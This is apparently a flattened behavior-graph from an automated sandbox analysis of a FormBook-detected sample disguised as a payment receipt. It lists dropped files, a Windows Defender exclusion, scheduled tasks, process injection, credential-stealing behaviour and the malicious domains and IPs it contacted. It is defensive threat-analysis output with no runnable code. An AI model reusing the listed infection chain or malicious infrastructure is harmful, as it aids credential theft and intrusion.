                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1622568 Sample: PAYMENT RECEIPT_USD21,000.exe Startdate: 24/02/2025 Architecture: WINDOWS Score: 100 59 www.nevath.xyz 2->59 61 www.needethereum.xyz 2->61 63 16 other IPs or domains 2->63 75 Sigma detected: Scheduled temp file as task from temp location 2->75 77 Multi AV Scanner detection for submitted file 2->77 79 Yara detected FormBook 2->79 83 7 other signatures 2->83 10 PAYMENT RECEIPT_USD21,000.exe 7 2->10         started        14 fttQgpyzkkc.exe 5 2->14         started        signatures3 81 Performs DNS queries to domains with low reputation 61->81 process4 file5 51 C:\Users\user\AppData\...\fttQgpyzkkc.exe, PE32 10->51 dropped 53 C:\Users\...\fttQgpyzkkc.exe:Zone.Identifier, ASCII 10->53 dropped 55 C:\Users\user\AppData\Local\...\tmp3A9E.tmp, XML 10->55 dropped 57 C:\...\PAYMENT RECEIPT_USD21,000.exe.log, ASCII 10->57 dropped 93 Adds a directory exclusion to Windows Defender 10->93 16 RegSvcs.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        95 Multi AV Scanner detection for dropped file 14->95 97 Writes to foreign memory regions 14->97 99 Allocates memory in foreign processes 14->99 101 Injects a PE file into a foreign processes 14->101 25 schtasks.exe 1 14->25         started        27 RegSvcs.exe 14->27         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 16->71 29 VfJW2xm7a.exe 16->29 injected 73 Loading BitLocker PowerShell Module 19->73 32 WmiPrvSE.exe 19->32         started        34 conhost.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 23->38         started        40 conhost.exe 25->40         started        process9 signatures10 103 Found direct / indirect Syscall (likely to bypass EDR) 29->103 42 wlanext.exe 13 29->42         started        process11 signatures12 85 Tries to steal Mail credentials (via file / registry access) 42->85 87 Tries to harvest and steal browser information (history, passwords, etc) 42->87 89 Modifies the context of a thread in another process (thread injection) 42->89 91 3 other signatures 42->91 45 VfJW2xm7a.exe 42->45 injected 49 firefox.exe 42->49         started        process13 dnsIp14 65 www.nevath.xyz 203.161.42.73, 53341, 53342, 53343 VNPT-AS-VNVNPTCorpVN Malaysia 45->65 67 www.conpactum.xyz 13.248.169.48, 49841, 53273, 53289 AMAZON-02US United States 45->67 69 7 other IPs or domains 45->69 105 Found direct / indirect Syscall (likely to bypass EDR) 45->105 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.